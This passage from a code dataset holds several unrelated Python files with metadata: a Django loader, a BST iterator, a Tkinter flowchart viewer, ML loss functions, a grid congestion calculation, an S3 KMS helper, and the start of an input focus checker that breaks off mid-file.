str(i))\n\n print(\"-----Finished loading orgss \")\n return HttpResponse(\"Loading data done!\")\n\n\ndef loadOrgIntoDB(org):\n newOrg = Organization.create(organization_id=org['organization_id'],\n organization_name=org['organization_name'],\n organization_unit_id=org[\n 'organization_unit_id'],\n organization_unit_name=org[\n 'organization_unit_name'],\n address=org['address'],\n city=org['city'],\n postal_code=org['postal_code'],\n phone=org['phone'],\n province_id=org['province_id'],\n fax=org['fax'],\n latitude=org['latitude'],\n longitude=org['longitude'],\n\n )\n\n newOrg.save()\n return\n\n\n\n\n\n\n\n","sub_path":"cars/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"439122985","text":"from common import TreeNode\n\nclass BSTIterator:\n\n def __init__(self, root: TreeNode):\n self.arr = []\n self.helper(root) \n\n def helper(self, root):\n if not root:\n return\n self.helper(root.left)\n self.arr.append(root.val)\n self.helper(root.right)\n \n def next(self) -> int:\n \"\"\"\n @return the next smallest number\n \"\"\"\n return self.arr.pop(0) \n \n\n def hasNext(self) -> bool:\n \"\"\"\n @return whether we have a next smallest number\n \"\"\"\n return len(self.arr) != 0\n\nif __name__ == \"__main__\":\n root = TreeNode(7)\n root.left = TreeNode(3)\n root.right = TreeNode(15)\n root.right.left = TreeNode(9)\n root.right.right = TreeNode(20)\n bst = BSTIterator(root)\n for _ in range(5):\n print(bst.next())\n print(bst.hasNext())","sub_path":"leetcode/tree/binary_search_tree_iterator.py","file_name":"binary_search_tree_iterator.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"511717402","text":"import constants as CONST\nimport nodes\nimport createTree\nimport fileaccess\n\nimport os\nimport subprocess\nimport textwrap\nimport sys\nimport inspect\nimport time\ntry:\n\timport Tkinter\nexcept ImportError:\n\timport tkinter as Tkinter\nfrom PIL import Image,ImageTk\nimport platform\n\nOS = platform.system()\n\nclass ChartFrame(Tkinter.Frame):\n\tdef __init__(self, parent,component):\n\t\tTkinter.Frame.__init__(self, parent)\n\t\tself.parent = parent\n\t\tself.nodeDict = {}\n\t\tself.component = component\n\t\tself.toolTip = []\n\t\tself.zoomScale = 1.0\n\t\tself.icons = {}\n\t\tself.iconImages = {}\n\t\tself.initUI()\n\t\tself.loadIcons()\n\t\n\tdef initUI(self):\n\t\tself.scrollbarV = 
Tkinter.Scrollbar(self,orient=Tkinter.VERTICAL)\n\t\tself.scrollbarV.pack(side=Tkinter.RIGHT, fill=Tkinter.Y)\n\t\tself.scrollbarH = Tkinter.Scrollbar(self,orient=Tkinter.HORIZONTAL)\n\t\tself.scrollbarH.pack(side=Tkinter.BOTTOM, fill=Tkinter.X)\n\t\t\n\t\tself.parent.title(self.component.upper())\n\t\tself.config(bg = \"#F0F0F0\")\n\t\tself.pack(fill = Tkinter.BOTH, expand = 1)\n\t\t#create canvas\n\t\tself.canvas = Tkinter.Canvas(self, relief = Tkinter.FLAT, background = \"#D2D2D2\",width = 800, height = 600,state=Tkinter.NORMAL)\n\t\tself.canvas.pack(side = Tkinter.LEFT, anchor = Tkinter.NW, expand=True, fill=Tkinter.BOTH, padx = 10, pady = 10)\n\t\t\n\t\tself.canvas.tag_bind(\"ButtonIcon\", \"<Button-1>\", self.setPressedIcon)\n\t\tself.canvas.tag_bind(\"ButtonIcon\", \"<ButtonRelease-1>\", self.resetPressedIcon)\n\t\tself.canvas.tag_bind(\"JumpToLine\", \"<Button-1>\", self.openExpandedCode)\n\t\tself.canvas.tag_bind(\"HasDetails\", \"<Enter>\", self.showToolTip)\n\t\tself.canvas.tag_bind(\"HasDetails\", \"<Leave>\", self.hideToolTip)\n\t\tself.canvas.tag_bind(\"CalledProgram\", \"<Button-1>\", self.createNewWindow)\n\t\t\n\t\tself.canvas.configure(xscrollcommand=self.scrollbarH.set,yscrollcommand=self.scrollbarV.set)\n\t\tself.scrollbarV.config(command=self.canvas.yview)\n\t\tself.scrollbarH.config(command=self.canvas.xview)\n\t\t\n\tdef zoom(self, key):\n\t\tredrawFlag = False\n\t\tzoomAmount = 1.0\n\t\tif key == \"+\" and self.zoomScale < 1.0:\n\t\t\tzoomAmount = 1.1\n\t\t\tredrawFlag = True\n\t\t\n\t\tif key == \"-\" and self.zoomScale > 0.1:\n\t\t\tzoomAmount = 1.0/1.1\n\t\t\tredrawFlag = True\n\t\t\n\t\tif redrawFlag:\n\t\t\tself.zoomScale *= zoomAmount\n\t\t\tself.canvas.scale(\"all\",0,0,zoomAmount,zoomAmount)\n\t\t\n\t\t\tfor iconName in self.iconImages.keys():\n\t\t\t\timg = self.iconImages[iconName]\n\t\t\t\timgResize = tuple(int(i*self.zoomScale) for i in img.size)\t# resize() needs a concrete (width, height) tuple\n\t\t\t\timg = img.resize(imgResize, Image.ANTIALIAS)\n\t\t\t\tself.icons[iconName] = ImageTk.PhotoImage(img)\n\t\t\t\t\n\t\t\tbuttons = self.canvas.find_withtag(\"ButtonIcon\")\n\t\t\tfor button in buttons:\n\t\t\t\tnode = self.nodeDict[button]\n\t\t\t\tself.canvas.itemconfig(button,image=self.icons[node.idleIcon()],activeimage=self.icons[node.hoverIcon()])\n\t\t\t\n\t\t\tbuttons = self.canvas.find_withtag(\"ButtonText\")\n\t\t\tnewFont = (CONST.FONT[0],1+int(CONST.FONT[1]*self.zoomScale*0.9),CONST.FONT[2])\n\t\t\tfor button in buttons:\n\t\t\t\tself.canvas.itemconfig(button,font=newFont)\n\t\t\t\t\n\t\t\tchartBox = self.canvas.bbox(\"all\")\n\t\t\tchartBorder = 50\n\t\t\tchartBox = (chartBox[0]-chartBorder,chartBox[1]-chartBorder,chartBox[2]+chartBorder,chartBox[3]+chartBorder)\n\t\t\tself.canvas.configure(scrollregion = chartBox)\n\t\t\n\tdef mouseWheelScroll(self, event):\n\t\tif event.delta == 0:\t\t\t# delta is 0 on Linux, where scrolling arrives as Button-4/5 events\n\t\t\tif event.num == 4:\n\t\t\t\tscroll = -1\n\t\t\telse:\n\t\t\t\tscroll = 1\n\t\telse:\n\t\t\tscroll = -1 * int(event.delta / 120)\n\t\t\t\n\t\t\t\n\t\tctrlPressed = event.state & (1 << 2)\n\t\t\n\t\tif ctrlPressed:\n\t\t\tif scroll < 0:\n\t\t\t\tself.zoom(\"+\")\n\t\t\telse:\n\t\t\t\tself.zoom(\"-\")\n\t\telse:\n\t\t\tself.canvas.yview_scroll(scroll, \"units\")\n\t\n\tdef loadIcons(self):\n\t\tfor iType in [\"branch\",\"db\",\"file\",\"info\",\"module\",\"process\",\"start\",\"loop\"]:\n\t\t\tfor state in [\"idle\",\"hover\",\"click\"]:\n\t\t\t\timgName = iType + \"-\" + state\n\t\t\t\timg = Image.open(CONST.ICONS + imgName +\".png\")\n\t\t\t\tself.iconImages[imgName] = img\n\t\t\t\tself.icons[imgName] = ImageTk.PhotoImage(img)\n\t\t\n\t\tallNodeClasses = 
inspect.getmembers(nodes, inspect.isclass)\n\t\tfor nodeClass in allNodeClasses:\n\t\t\tnodeClass = nodeClass[1]\n\t\t\tif nodeClass.iconName:\n\t\t\t\tnodeClass.iconWidth = self.icons[nodeClass.iconName+\"-\"+state].width()\n\t\t\t\tnodeClass.iconHeight = self.icons[nodeClass.iconName+\"-\"+state].height()\n\t\n\tdef newBlock(self,node,x,y):\n\t\tobjId = self.canvas.create_image(x,y,image=self.icons[node.idleIcon()],activeimage=self.icons[node.hoverIcon()],tags=node.tags)\n\t\ttextId = self.canvas.create_text(x,y,text=node.iconText(),font=CONST.FONT,fill=\"#000000\",state=Tkinter.DISABLED,tags=\"ButtonText\")\n\t\t\n\t\tself.nodeDict[objId] = node\n\t\t\n\tdef joiningLine(self,linePoints,bend=False,node=False):\n\n\t\tif len(linePoints) == 4:\n\t\t\tprevX,prevY,curX,curY = linePoints\n\t\t\tif bend == \"N\":\n\t\t\t\tmidY = (prevY + curY)/2\n\t\t\t\tlinePoints = (prevX,prevY,prevX,midY,curX,midY,curX,curY)\n\t\t\telif bend == \"7\":\n\t\t\t\tlinePoints = (prevX,prevY,curX,prevY,curX,curY)\n\t\t\n\t\tif len(linePoints) == 5:\n\t\t\tprevX,prevY,curX,curY,outX = linePoints\n\t\t\tif bend == \"C\":\n\t\t\t\tlinePoints = (prevX,prevY,prevX-outX,prevY,curX-outX,curY,curX,curY)\n\t\t\telif bend == \"-C\":\n\t\t\t\tlinePoints = (prevX,prevY,prevX+outX,prevY,curX+outX,curY,curX,curY)\n\t\t\n\t\tif node:\n\t\t\ttags = (\"Lines\",\"JumpToLine\",\"HasDetails\")\n\t\t\tlineId = self.canvas.create_line(linePoints,fill=\"#000000\",tags=tags,width=2,activewidth=4)\n\t\t\tself.nodeDict[lineId] = node\n\t\telse:\n\t\t\ttags = (\"Lines\")\n\t\t\tself.canvas.create_line(linePoints,fill=\"#000000\",tags=tags,width=1)\n\t\t\t\n\t\tself.canvas.tag_lower(\"Lines\")\n\t\n\tdef setPressedIcon(self,event):\n\t\tcanvas = event.widget\n\t\tobjId = canvas.find_withtag(\"current\")[0]\n\t\t\n\t\tnode = self.nodeDict[objId]\n\t\tcanvas.itemconfig(objId,activeimage=self.icons[node.clickIcon()])\n\t\t\n\tdef resetPressedIcon(self,event):\n\t\tcanvas = event.widget\n\t\tobjId = canvas.find_withtag(\"current\")[0]\n\t\t\n\t\tnode = self.nodeDict[objId]\n\t\tcanvas.itemconfig(objId,activeimage=self.icons[node.hoverIcon()])\n\t\t\n\tdef openExpandedCode(self,event):\n\t\tcanvas = event.widget\n\t\tobjId = canvas.find_withtag(\"current\")[0]\n\t\t\n\t\tnode = self.nodeDict[objId]\n\t\t\n\t\tcomponentLocation = '\"' + fileaccess.extractExpandedFile(self.component) + '\"'\n\t\tlineNo = \"-n\" + str(node.lineNo)\n\t\tcommand = \"\\\"\" + CONST.NPLOCATION + \"\\\"\" + \" \" + componentLocation + \" \" + lineNo\n\t\tif OS == \"Linux\":\n\t\t\tos.system(\"notepad-plus-plus\" + \" \" + componentLocation + \" \" + lineNo)\n\t\telse:\n\t\t\tsubprocess.call(command)\n\t\n\tdef showToolTip(self,event):\n\t\tcanvas = event.widget\n\t\tobjId = canvas.find_withtag(\"current\")[0]\n\t\tif objId in self.toolTip:\n\t\t\treturn\n\t\t\n\t\tself.toolTip.append(objId)\n\t\t\n\t\tpoints = canvas.bbox(objId)\n\t\t#x = (points[0] + points[2])/2\n\t\t#y = (points[1] + points[3])/2\n\t\tx = canvas.canvasx(event.x)\n\t\ty = canvas.canvasy(event.y)\n\t\t\n\t\tnode = self.nodeDict[objId]\n\t\ttext = node.description()\t\t\n\t\tif text:\n\t\t\tlines = text.split(\"\\n\")\n\t\t\tlines = [textwrap.fill(line,CONST.TOOLTIPSIZE) for line in lines]\n\t\t\ttext = \"\\n\".join(lines)\n\t\t\ttextLabel = self.canvas.create_text(x,y,text=text,anchor=\"nw\",font=CONST.TOOLTIPFONT,fill=\"#000000\",tags=\"ToolTip\",state=Tkinter.DISABLED)\n\t\t\ttextBg = 
self.canvas.create_rectangle(self.canvas.bbox(textLabel),fill=\"white\",tags=\"ToolTip\",state=Tkinter.DISABLED)\n\t\t\tself.canvas.tag_lower(textBg,textLabel)\n\t\t\n\tdef hideToolTip(self,event):\n\t\tcanvas = event.widget\n\t\tobjIds = canvas.find_withtag(\"ToolTip\")\n\t\t\n\t\tself.toolTip = []\n\t\t\n\t\tfor objId in objIds:\n\t\t\tcanvas.delete(objId)\n\t\t\t\n\tdef createNewWindow(self,event):\n\t\tcanvas = event.widget\n\t\tobjId = canvas.find_withtag(\"current\")[0]\n\t\t\n\t\tnode = self.nodeDict[objId]\n\t\tnewComponent = node.moduleName\n\t\tcreateNewWindow(newComponent)\n\t\n\t\nclass ChartWindow(Tkinter.Toplevel):\n\tcharts = {}\n\tdef __init__(self,component):\n\t\tTkinter.Toplevel.__init__(self)\n\t\tcomponent = component.upper()\n\t\t\n\t\tself.chartFrame = False\n\t\tself.component = component\n\t\tself.protocol(\"WM_DELETE_WINDOW\", self.eraseChart)\n\t\t\n\t\tself.createWindow()\n\t\n\tdef eraseChart(self):\n\t\ttry:\n\t\t\tdel ChartWindow.charts[self.component]\n\t\texcept KeyError:\n\t\t\tpass\n\t\tself.destroy()\n\t\n\tdef drawFlowChart(self,nodeList,curX,curY):\n\t\tprevHeight = 0\n\t\tcurrentHeight = 0\n\t\tjoiningLineLength = prevHeight + currentHeight\n\t\tfor node in nodeList:\n\t\t\tprevHeight = currentHeight\n\t\t\tcurrentHeight = node.height()\n\t\t\tjoiningLineLength = prevHeight + currentHeight\n\t\t\t\n\t\t\tif node.isEmpty():\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif node.__class__ is nodes.NonLoopBranch:\n\t\t\t\tcurX, curY = self.drawFlowChart(node.branch,curX,curY)\n\t\t\telse:\n\t\t\t\tprevX, prevY = curX, curY\n\t\t\t\tcurY += joiningLineLength/2\n\t\t\t\tlinePoints = (prevX,prevY,curX,curY)\n\t\t\t\tself.chartFrame.joiningLine(linePoints)\n\t\t\t\tself.chartFrame.newBlock(node,curX,curY)\n\t\t\t\n\t\t\tif node.__class__ is nodes.LoopBranch:\n\t\t\t\tprevX, prevY = curX, curY\n\t\t\t\tcurY += joiningLineLength/2\n\t\t\t\tlinePoints = (prevX,prevY,curX,curY)\n\t\t\t\tself.chartFrame.joiningLine(linePoints)\n\t\t\t\tretX, retY = self.drawFlowChart(node.branch,curX,curY)\n\t\t\t\tlinePoints = (curX,curY-joiningLineLength/2,retX,retY,node.width()/2+node.nodeWidth()/8)\n\t\t\t\tself.chartFrame.joiningLine(linePoints,\"-C\",node=node)\n\t\t\t\t\n\t\t\t\tcurY = retY\n\t\t\t\n\t\t\t\n\t\t\tif node.__class__ is nodes.IfNode:\n\t\t\t\tprevX, prevY = curX, curY\n\t\t\t\tcurY += joiningLineLength/2\n\t\t\t\t\n\t\t\t\ttempX = {}\n\t\t\t\ttempY = {}\n\t\t\t\tterminatedBranch = {}\n\t\t\t\ttempX[True] = curX - node.branch[False].width()/2\t\t#use opposite branch width\n\t\t\t\ttempX[False] = curX + node.branch[True].width()/2\t\t#use opposite branch width\n\t\t\t\t\n\t\t\t\tfor branch in [True,False]:\n\t\t\t\t\tbranchNode = node.branch[branch]\n\t\t\t\t\tlinePoints = (prevX,prevY,tempX[branch],curY)\n\t\t\t\t\tself.chartFrame.joiningLine(linePoints,bend=\"7\",node=branchNode)\n\t\t\t\t\ttempX[branch], tempY[branch] = self.drawFlowChart(branchNode.branch,tempX[branch],curY)\n\t\t\t\t\tterminatedBranch[branch] = self.isTerminatedBranch(branchNode.branch)\n\t\t\t\t\n\t\t\t\tif tempY[True] < tempY[False]:\n\t\t\t\t\textX, extY = tempX[True], tempY[False]\n\t\t\t\telse:\n\t\t\t\t\textX, extY = tempX[False], tempY[True]\n\t\t\t\t\n\t\t\t\tfor branch in [True,False]:\n\t\t\t\t\tif not terminatedBranch[branch]:\n\t\t\t\t\t\tif tempY[branch] != extY:\n\t\t\t\t\t\t\tlinePoints = (tempX[branch],tempY[branch],tempX[branch],extY)\n\t\t\t\t\t\t\tself.chartFrame.joiningLine(linePoints)\n\t\t\t\t\t\tlinePoints = 
(tempX[branch],extY,curX,extY)\n\t\t\t\t\t\tself.chartFrame.joiningLine(linePoints)\n\t\t\t\t\n\t\t\t\tcurY = extY\n\t\t\t\n\t\t\t\n\t\t\tif node.__class__ is nodes.EvaluateNode:\n\t\t\t\tarrangedWhen = []\n\t\t\t\tfor i,branch in enumerate(node.whenList):\n\t\t\t\t\tbreakFlag = False\n\t\t\t\t\tfor j,branch2 in enumerate(arrangedWhen):\n\t\t\t\t\t\tif branch2.width() > branch.width():\n\t\t\t\t\t\t\tarrangedWhen.insert(j,branch)\n\t\t\t\t\t\t\tbreakFlag = True\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\tif not breakFlag:\n\t\t\t\t\t\tarrangedWhen.append(branch)\n\t\t\t\t\n\t\t\t\ttotalWidth = 0\n\t\t\t\tfor branch in arrangedWhen:\n\t\t\t\t\ttotalWidth += branch.width()\n\n\t\t\t\tprevX, prevY = curX, curY\n\t\t\t\tcurY += joiningLineLength\n\t\t\t\t\t\n\t\t\t\tbranchEndPoints = []\n\t\t\t\t\n\t\t\t\tevenWidth = 0\n\t\t\t\toddWidth = 0\n\t\t\t\tfor i,newNode in enumerate(arrangedWhen):\n\t\t\t\t\tnewNodeWidth = newNode.width()\n\t\t\t\t\tif i % 2:\n\t\t\t\t\t\tnewX = curX + evenWidth + newNodeWidth/2 - totalWidth/2\n\t\t\t\t\t\tevenWidth += newNodeWidth\n\t\t\t\t\telse:\n\t\t\t\t\t\tnewX = curX - oddWidth - newNodeWidth/2 + totalWidth/2\n\t\t\t\t\t\toddWidth += newNodeWidth\n\t\t\t\t\t\n\t\t\t\t\tlinePoints = (prevX,prevY,newX,curY - joiningLineLength/2,newX,curY)\n\t\t\t\t\tself.chartFrame.joiningLine(linePoints,node=newNode)\n\t\t\t\t\tendPoints = self.drawFlowChart(newNode.branch,newX,curY)\n\t\t\t\t\tbranchEndPoints.append(endPoints)\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tmaxY = -1\n\t\t\t\tfor point in branchEndPoints:\n\t\t\t\t\tif point[1] > maxY:\n\t\t\t\t\t\tmaxY = point[1]\n\t\t\t\tcurY = maxY\n\t\t\t\t\n\t\t\t\tprevX, prevY = curX, curY\n\t\t\t\tcurY += joiningLineLength\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tminX = branchEndPoints[0][0]\n\t\t\t\ttry:\n\t\t\t\t\tmaxX = branchEndPoints[1][0]\n\t\t\t\texcept IndexError:\n\t\t\t\t\tmaxX = minX\n\t\t\t\t\n\t\t\t\tfor i,point in enumerate(branchEndPoints):\n\t\t\t\t\tif not self.isTerminatedBranch(arrangedWhen[i].branch):\n\t\t\t\t\t\tif point[1] != maxY:\n\t\t\t\t\t\t\tlinePoints = (point[0],point[1],point[0],maxY)\n\t\t\t\t\t\t\tself.chartFrame.joiningLine(linePoints)\n\t\t\t\t\t\tlinePoints = (point[0],maxY,curX,curY)\n\t\t\t\t\t\tself.chartFrame.joiningLine(linePoints,bend=\"N\")\n\t\t\t\t\n\t\t\t\n\t\t\tprevX, prevY = curX, curY\n\t\t\tcurY += joiningLineLength/2\n\t\t\tif node.__class__ is not nodes.EndNode:\n\t\t\t\tlinePoints = (prevX,prevY,curX,curY)\n\t\t\t\tself.chartFrame.joiningLine(linePoints)\n\t\t\n\t\t\n\t\treturn curX, curY\n\t\t\n\tdef isTerminatedBranch(self,branch):\n\t\tif not branch:\n\t\t\treturn False\n\t\t\n\t\tnode = branch[-1]\n\t\t\n\t\tif node.__class__ is nodes.GoToBranch or node.__class__ is nodes.EndNode:\n\t\t\treturn True\n\t\t\t\n\t\tif node.__class__ is nodes.LoopBranch or node.__class__ is nodes.NonLoopBranch:\n\t\t\treturn self.isTerminatedBranch(node.branch)\n\t\n\tdef alreadyExists(self,component):\n\t\tif component in ChartWindow.charts:\n\t\t\tChartWindow.charts[component].focus_set()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\t\n\tdef createWindow(self):\n\t\tstartTime = time.time()\n\t\t\n\t\tnodes = createTree.getChart(self.component)\n\n\t\tRWidth = int(self.winfo_screenwidth()*0.5)\n\t\tRHeight = int(self.winfo_screenheight()*0.95)\n\t\tself.geometry((\"%dx%d\")%(RWidth,RHeight))\n\t\t\n\t\tself.chartFrame = ChartFrame(self,self.component)\n\t\tself.drawFlowChart(nodes,int(self.chartFrame.winfo_screenwidth()*0.25),20)\n\t\tchartBox = self.chartFrame.canvas.bbox(\"all\")\n\t\tchartBorder = 50\n\t\tchartBox = 
(chartBox[0]-chartBorder,chartBox[1]-chartBorder,chartBox[2]+chartBorder,chartBox[3]+chartBorder)\n\t\tself.chartFrame.canvas.configure(scrollregion = chartBox)\n\t\tif OS == \"Linux\":\n\t\t\tself.bind(\"<4>\",self.chartFrame.mouseWheelScroll)\n\t\t\tself.bind(\"<5>\",self.chartFrame.mouseWheelScroll)\n\t\telse:\n\t\t\tself.bind(\"<MouseWheel>\",self.chartFrame.mouseWheelScroll)\n\t\t\n\t\tprint(time.time() - startTime)\n\n\ndef createNewWindow(component):\n\tcomponent = component.upper()\n\tif fileaccess.validComponentName(component):\n\t\tif component in ChartWindow.charts:\n\t\t\tChartWindow.charts[component].focus_set()\n\t\telse:\n\t\t\tChartWindow.charts[component] = ChartWindow(component)\n\t\n\t\n\t\ndef main():\n\troot = Tkinter.Tk()\n\t\n\tinputBox = Tkinter.Entry(root)\n\tinputBox.pack()\n\tinputBox.insert(0,\"vib3248\")\n\tinputBoxButton = Tkinter.Button(root,text=\"OPEN\",command=lambda:createNewWindow(inputBox.get()))\n\tinputBox.bind(\"<Return>\",lambda e:createNewWindow(inputBox.get()))\n\tinputBoxButton.pack()\n\t\n\troot.mainloop()\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"src/flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":14048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"468435787","text":"def answer(n):\n    # your code here\n    n = int (n)\n    check = { 1 : 0 , 2 : 1 }\n\n    def finder(n):\n        if n in check:\n            return check[n]\n        if n % 2 == 0 : check[n] = finder(n // 2 ) + 1\n        else : check[n] = min (finder((n + 1 ) // 2 ) + 2,finder((n - 1 ) // 2 ) + 2 )\n        return check[n]\n    return finder(n)\n\nfor n in range(1, 65):\n    print(\"%s: %s\" % (n, answer(n)))\n","sub_path":"training/lvl2q2.py","file_name":"lvl2q2.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"240994683","text":"import torch\n\n\ndef calculate_kl(\n    drops_proba: torch.FloatTensor,\n    prior_proba: float,\n    kl_coeff: float = 1\n) -> torch.FloatTensor:\n    kl_div = kl_coeff * (\n        drops_proba * torch.log(torch.clamp(drops_proba / prior_proba, min=1e-8))\n        + (1 - drops_proba)\n        * torch.log(torch.clamp((1 - drops_proba) / (1 - prior_proba), min=1e-8))\n    ).sum(dim=1)\n\n    return kl_div\n\n\ndef variational_translation_loss(\n    src_drops_proba: torch.FloatTensor,\n    tgt_drops_proba: torch.FloatTensor,\n    src_possible_merges: (torch.FloatTensor, torch.FloatTensor),\n    tgt_possible_merges: (torch.FloatTensor, torch.FloatTensor),\n    kl_coeff: float = 1,\n    src_prior_proba: float = None,\n    tgt_prior_proba: float = None,\n    only_src: bool = False\n) -> (torch.FloatTensor, torch.FloatTensor, torch.FloatTensor):\n    # Invert the tensor to get the probability of skipping a merge.\n    # This is needed because drops_proba initially holds the probabilities of keeping a merge\n    src_drops_proba = 1 - src_drops_proba\n\n    src_used_per_id = src_possible_merges[0]\n    src_missed_per_id = src_possible_merges[1]\n\n    rl_loss = (\n        src_missed_per_id * torch.log(torch.clamp(src_drops_proba, min=1e-8)) +\n        src_used_per_id * torch.log(torch.clamp(1 - src_drops_proba, min=1e-8))\n    ).sum(dim=1)\n\n    if not only_src:\n        tgt_drops_proba = 1 - tgt_drops_proba\n\n        tgt_used_per_id = tgt_possible_merges[0]\n        tgt_missed_per_id = tgt_possible_merges[1]\n\n        rl_loss += (\n            tgt_missed_per_id * torch.log(torch.clamp(tgt_drops_proba, min=1e-8)) +\n            tgt_used_per_id * torch.log(torch.clamp(1 - tgt_drops_proba, min=1e-8))\n        ).sum(dim=1)\n\n        tgt_kl_loss = calculate_kl(tgt_drops_proba, prior_proba=tgt_prior_proba, kl_coeff=kl_coeff)\n    
else:\n tgt_kl_loss = None\n\n src_kl_loss = calculate_kl(src_drops_proba, prior_proba=src_prior_proba, kl_coeff=kl_coeff)\n\n return rl_loss, src_kl_loss, tgt_kl_loss\n","sub_path":"onmt/variational/var_loss.py","file_name":"var_loss.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"254280136","text":"import numpy as np\nimport pandas as pd\nfrom powersimdata.input.input_data import get_bus_demand\nfrom powersimdata.scenario.analyze import Analyze\nfrom powersimdata.scenario.scenario import Scenario\n\nfrom postreise.analyze.helpers import summarize_plant_to_bus\n\n\ndef calculate_congestion_surplus(scenario):\n \"\"\"Calculates hourly congestion surplus.\n\n :param powersimdata.scenario.scenario.Scenario scenario: scenario instance.\n :return: (*pandas.DataFrame*) -- congestion surplus.\n \"\"\"\n\n if not isinstance(scenario, Scenario):\n raise TypeError(\"scenario must be a Scenario object\")\n if not isinstance(scenario.state, Analyze):\n raise ValueError(\"scenario.state must be Analyze\")\n\n grid = scenario.state.get_grid()\n lmp = scenario.state.get_lmp()\n pg = scenario.state.get_pg()\n\n bus_demand = get_bus_demand(scenario.info, grid).to_numpy()\n bus_pg = summarize_plant_to_bus(pg, grid, all_buses=True)\n\n congestion_surplus = (lmp.to_numpy() * (bus_demand - bus_pg)).sum(axis=1)\n # Remove any negative values caused by barrier method imprecision\n congestion_surplus = np.clip(congestion_surplus, a_min=0, a_max=None)\n # Return a pandas Series with same index as pg\n congestion_surplus = pd.Series(data=congestion_surplus, index=pg.index)\n congestion_surplus.rename_axis(pg.index.name)\n return congestion_surplus\n","sub_path":"postreise/analyze/transmission/congestion.py","file_name":"congestion.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"309987844","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nfrom builtins import (bytes, str, open, super, range, zip, round, input, int, pow, object)\nfrom clari_dynamo.conf.constants import *\n\nfrom clari_dynamo import utils\n\n\nfrom boto.s3.connection import S3Connection\nfrom boto.s3.key import Key\nfrom boto.s3.connection import OrdinaryCallingFormat\n\nCONNECTION = S3Connection(host='s3.amazonaws.com', debug=2, is_secure=True,\n calling_format=OrdinaryCallingFormat())\nBUCKET = CONNECTION.get_bucket(AWS_KMS_S3_BUCKET_NAME)\n\n\ndef put(table_name, item_name, data):\n # alphanumeric = 36 characters - so 25 chars gives around\n # the same cardinality of GUID (about 2.4x)\n file_name = '{0:s}.{1:s}.{2:s}'.format(table_name, item_name,\n utils.quick_random_str(24))\n\n key = Key(BUCKET)\n key.key = file_name\n key.set_contents_from_string(data, headers=get_kms_headers())\n\n return key\n\n\ndef delete(key_string):\n key = Key(BUCKET)\n key.key = key_string\n BUCKET.delete_key(key)\n\n\ndef get(key_string):\n key = Key(BUCKET)\n key.key = key_string\n ret = key.get_contents_as_string()\n return ret\n\n\ndef get_kms_headers():\n return {\n 'x-amz-server-side-encryption': 'aws:kms',\n 'x-amz-server-side-encryption-aws-kms-key-id':\n os.environ['CLARI_DYNAMO_AWS_KMS_KEY_ARN_ID']}","sub_path":"clari_dynamo/s3_kms.py","file_name":"s3_kms.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} 
+{"seq_id":"311816786","text":"from .common import prettywarn\nimport sys, os\n\n# By default it just read kandinsky window (only if is focused)\nUSE_KANDINSKY_INPUT_ONLY = 'ION_DISABLE_KANDINSKY_INPUT_ONLY' not in os.environ\n# Option to get input everywhere on system\nGET_INPUT_EVERYWHERE = 'ION_ENABLE_GET_INPUT_EVERYWHERE' in os.environ\n\n\nif GET_INPUT_EVERYWHERE:\n # Fake FocusChecker class, will always return True\n class FocusChecker:\n def __init__(self): ...\n def __call__(self): return True\n\n\nelif sys.platform == \"win32\":\n import ctypes\n\n def GetFirstWindowFromThreadProcessId(pid, class_name=None, not_class_name=False, contains_name=None):\n window = ctypes.c_uint(0)\n if class_name:\n if type(class_name) in (list, tuple): pass\n elif type(class_name) == str: class_name = (class_name,)\n else: raise TypeError(\"invalid type for class name\")\n if contains_name and type(contains_name) != str: raise TypeError(\"invalid type for contains name\")\n \n def foreach_window(hwnd, _):\n lpdw = ctypes.c_uint()\n ctypes.windll.user32.GetWindowThreadProcessId(hwnd, ctypes.byref(lpdw))\n \n if lpdw.value == pid and ctypes.windll.user32.IsWindowVisible(hwnd):\n if class_name:\n buff = ctypes.create_unicode_buffer(256)\n ctypes.windll.user32.GetClassNameW(hwnd, buff)\n \n if not ((not_class_name and any([buff.value != name for name in class_name])) or\n (not not_class_name and any([buff.value == name for name in class_name]))): \n return True\n \n if contains_name:\n buff = ctypes.create_unicode_buffer(256)\n ctypes.windll.user32.GetWindowTextW(hwnd, buff, 256)\n\n if contains_name.lower() not in buff.value.lower(): return True\n \n window.value = hwnd\n return False\n return True\n \n ctypes.windll.user32.EnumWindows(ctypes.WINFUNCTYPE(ctypes.c_bool, ctypes.c_uint, ctypes.c_uint)(foreach_window), 0)\n return window.value\n\n class FocusChecker:\n kandinsky_window_id = 0\n kandinsky_not_found_error_printed = False\n python_window_id = 0\n\n def __init__(self):\n if self.kandinsky_window_id == 0 and \"kandinsky\" in sys.modules:\n #To find kandinsky is more simple, no need to find parent processes with a valid window\n # 'TkTopLevel' is the class name of root tkinter window, 'pygame' because in old releases of kandinsky i used pygame\n self.kandinsky_window_id = GetFirstWindowFromThreadProcessId(os.getpid(), (\"TkTopLevel\", \"pygame\"), False, \"kandinsky\")\n\n if self.kandinsky_window_id == 0 and not self.kandinsky_not_found_error_printed:\n # Kandinsky window not found\n prettywarn(\"could not find the kandinsky window to get inputs.\", RuntimeWarning)\n self.kandinsky_not_found_error_printed = True\n\n if USE_KANDINSKY_INPUT_ONLY: \n 